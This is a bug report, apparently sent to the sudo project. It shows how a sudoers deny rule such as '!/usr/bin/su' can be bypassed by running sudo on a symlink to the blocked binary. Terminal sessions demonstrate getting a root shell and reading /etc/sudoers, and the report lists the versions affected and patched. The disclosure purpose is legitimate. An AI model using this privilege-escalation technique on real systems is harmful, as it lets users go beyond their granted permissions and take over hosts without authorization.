Bug 1009

When you add a user to sudoers file, and attempt to block them from editing specific files you can do this by the following:

username   ALL=ALL, !/usr/bin/su

This will prevent the user from running the sudo su command to get a root shell.

I have found that the following exploit will work:

1c44h1wy7i@pd-lpsrtlus498:~$ sudo su
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/su' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /usr/bin/su su_exploit
1c44h1wy7i@pd-lpsrtlus498:~$ sudo ./su_exploit
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# 


This works for any file that has been explicitly blacklisted. And can also be used to edit blacklisted files. 

1c44h1wy7i@pd-lpsrtlus498:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat /etc/sudoers
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/cat /etc/sudoers' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /etc/sudoers sudoers_exp
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat sudoers_exp
# testing
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#


This appears to work on any version of sudo 1.8.x (including the default sudo 1.8.31/32 available on Ubuntu 20)

It is patched on Sudo version 1.9.5p2 installed on my Fedora box. (not sure what version patched it)